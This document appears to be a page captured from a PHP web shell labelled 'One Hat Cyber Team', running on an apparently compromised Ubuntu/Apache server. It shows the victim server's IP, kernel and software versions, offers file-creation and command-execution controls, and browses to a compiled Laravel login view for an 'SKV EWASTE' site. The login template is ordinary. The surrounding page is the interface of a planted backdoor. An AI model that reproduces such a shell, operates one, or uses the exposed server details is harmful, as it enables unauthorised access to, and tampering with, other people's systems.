⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.5
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
html
/
storage
/
framework
/
views
/
View File Name :
0faaf967a3096324a025196379f0d542f0d47fe6.php
<?php $__env->startSection('js_after'); ?> <!-- Page JS Plugins --> <!-- Page JS Code --> <script src="<?php echo e(asset('js/plugins/jquery-validation/jquery.validate.min.js')); ?>"></script> <script src="<?php echo e(asset('js/plugins/jquery-validation/additional-methods.js')); ?>"></script> <script src="<?php echo e(asset('js/plugins/bootstrap-notify/bootstrap-notify.min.js')); ?>"></script> <script> jQuery(document).ready(function(){ One.helpers('validation'); jQuery('.js-validation').validate({ ignore: [], rules: { 'email': { required: true, }, 'password': { required: true, }, }, messages: { 'email':'Please enter username', 'password':'Please enter password', } }); <?php if($errors->has('invalid_credential')): ?> One.helpers('notify', {align: 'center',type: 'danger', message: '<?php echo e($errors->first("invalid_credential")); ?>'}); <?php endif; ?> }); </script> <?php $__env->stopSection(); ?> <?php $__env->startSection('content'); ?> <div class="hero-static"> <div class="content"> <div class="row justify-content-center"> <div class="col-md-8 col-lg-6 col-xl-4"> <!-- Sign In Block --> <div class="block block-rounded block-themed mb-0"> <div class="block-header bg-primary-dark d-flex justify-content-center align-items-center"> <img src="<?php echo e(asset('/crm/logo.png')); ?>" style="margin: 0 auto height: 10px; width:15%" alt=""></img> <span class="text-center">SKV EWASTE</span> </div> <div class="block-content"> <div class="p-sm-3 px-lg-4 py-lg-5"> <h1 class="h2 mb-1">Login</h1> <!-- Sign In Form --> <!-- jQuery Validation (.js-validation-signin class is initialized in js/pages/op_auth_signin.min.js which was auto compiled from _js/pages/op_auth_signin.js) --> <!-- For more info and examples you can check out https://github.com/jzaefferer/jquery-validation --> <form name="login" class="js-validation" action="<?php echo e(route('verifylogin')); ?>" method="post"> <?php echo csrf_field(); ?> <div class="py-3"> <div class="form-group"> <input type="text" class="form-control form-control-alt form-control-lg" id="email" name="email" placeholder="Email"> </div> <div class="form-group"> <input type="password" class="form-control form-control-alt form-control-lg" id="password" name="password" placeholder="Password"> </div> </div> <div class="form-group row"> <div class="col-md-6 col-xl-5"> <button type="submit" class="btn btn-block btn-alt-primary"> <i class="fa fa-fw fa-sign-in-alt mr-1"></i> Sign In </button> </div> </div> </form> <!-- END Sign In Form --> </div> </div> </div> <!-- END Sign In Block --> </div> </div> </div> <div class="content content-full font-size-sm text-muted text-center"> <strong>Site Name</strong> © <span data-toggle="year-copy"></span> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('backend.layouts.simple', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /var/www/html/resources/views/backend/auth.blade.php ENDPATH**/ ?>